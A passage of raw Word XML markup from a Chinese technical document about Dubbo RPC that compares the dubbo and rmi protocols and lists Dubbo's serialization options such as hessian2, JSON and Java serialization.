          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现的一种高效的、支持多种编程语言的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>远程服务调用的框架</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37368" w:rsidRPr="00F37368" w:rsidRDefault="00F37368" w:rsidP="00C344EF">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00821DDE" w:rsidRDefault="00D70B17" w:rsidP="00821DDE">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00AD7D11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.4.2</w:t>
      </w:r>
      <w:r w:rsidR="00821DDE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00EF00CD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hessian</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A03B87" w:rsidRDefault="00D70B17" w:rsidP="00A03B87">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00AD7D11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.4.2</w:t>
      </w:r>
      <w:r w:rsidR="00A03B87">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.2 dubbo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A03B87" w:rsidRDefault="009C7E95" w:rsidP="00E25A24">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从单线程测试结果可以看出，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dubbo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>复用单一长连接更适合满足高并发小数据量的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rpc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>调用，而在大数据量下的传输性能并不好，建议使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rmi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议，多线程测试中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dubbo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议对小数据量的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rpc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>调用同样保持优势</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5D0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，在大数据量的传输中由于长连接的原因对比</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5D0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rmi</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5D0F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议传输耗时差距并不明显</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，这点同样验证了上述观点。关于数据的序列化方式选择需要考虑序列化和反序列化的效率问题，传输内容的大小，以及格式的兼容性约束，其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hessian2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>duobb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3F3F3F"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议下的默认序列化方式，推荐使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70B17" w:rsidRPr="00F41A4C" w:rsidRDefault="00D70B17" w:rsidP="00D70B17">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>.4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dubbo</w:t>
      </w:r>
      <w:r w:rsidR="001D3075">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序列化方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003210DB" w:rsidRDefault="00AC3DA1" w:rsidP="00A03B87">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dubbo</w:t>
      </w:r>
      <w:r w:rsidR="007340F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序列化方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要包括以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007340F5" w:rsidRPr="00AC3DA1" w:rsidRDefault="007340F5" w:rsidP="00A03B87"/>
    <w:p w:rsidR="007340F5" w:rsidRDefault="007340F5" w:rsidP="007340F5">
      <w:pPr>
        <w:widowControl/>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3021330" cy="4293870"/>
            <wp:effectExtent l="19050" t="0" r="7620" b="0"/>
            <wp:docPr id="235" name="图片 3" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\FDU19DVD2EDGP2M~}XM_MN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strator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\FDU19DVD2EDGP2M~}XM_MNX.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId302" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3021330" cy="4293870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00786256" w:rsidRPr="00786256" w:rsidRDefault="00786256" w:rsidP="00786256">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="376" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在dubbo RPC中，同时支持多种序列化方式，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00786256" w:rsidRPr="00786256" w:rsidRDefault="00786256" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="376" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>dubbo序列化：阿里尚未开发成熟的高效java序列化实现，阿里不建议在生产环境使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00786256" w:rsidRPr="00786256" w:rsidRDefault="00786256" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="376" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hessian2序列化：hessian是一种跨语言的高效二进制序列化方式。但这里实际不是原生的hessian2序列化，而是阿里修改过的hessian lite，它是dubbo RPC默认启用的序列化方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00786256" w:rsidRPr="00786256" w:rsidRDefault="00786256" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="376" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>json序列化：目前有两种实现，一种是采用的阿里的fastjson库，另一种是采用dubbo中自己实现的简单json库，但其实现都不是特别成熟，而且json这种文本序列化性能一般不如上面两种二进制序列化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00786256" w:rsidRPr="00786256" w:rsidRDefault="00786256" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="376" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>java序列化：主要是采用JDK自带的Java序列化实现，性能很不理想。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00786256" w:rsidRPr="00F70D36" w:rsidRDefault="00786256" w:rsidP="00F70D36">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="376" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在通常情况下式比较般配，而第1个dubbo序列化由于还不成熟，所以实际只剩下2可用，所以dubbo RPC默认采</w:t>
      </w:r>
      <w:r w:rsidR="00785BB2" w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，这四种</w:t>
      </w:r>
      <w:r w:rsidR="00785BB2" w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>主要序列化方式的性能从上到下依次递减</w:t>
      </w:r>
      <w:r w:rsidR="00785BB2" w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。对于dubbo RPC这种追求高性能的远程调用方式来说，实际上只有1、2两种高效序列化方</w:t>
      </w:r>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>用hessian2序列化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3DA1" w:rsidRPr="00786256" w:rsidRDefault="00AC3DA1" w:rsidP="00E90FC0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NativeJavaSerialization：原生java序列化实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3DA1" w:rsidRPr="00AC3DA1" w:rsidRDefault="00AC3DA1" w:rsidP="00E90FC0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC3DA1">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CompactedJavaSerialization：压缩java序列化，主要是在原生java序列化基础上，实现了自定义的类描述符写入和读取，写Object类型的类描述符只写入类名称，而不是类的完整信息。这样有很多Object类型的情况下可以减少序列化后的size。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3DA1" w:rsidRPr="00786256" w:rsidRDefault="00AC3DA1" w:rsidP="00E90FC0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JavaSerialization：只是对原生java序列化和压缩java序列化的封装。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3DA1" w:rsidRPr="00786256" w:rsidRDefault="00AC3DA1" w:rsidP="00E90FC0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>JsonSerialization：原生JSON序列化实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3DA1" w:rsidRPr="00786256" w:rsidRDefault="00AC3DA1" w:rsidP="00E90FC0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FastJsonSerialization：使用阿里的FastJson实现的序列化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3DA1" w:rsidRPr="00786256" w:rsidRDefault="00AC3DA1" w:rsidP="00E90FC0">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
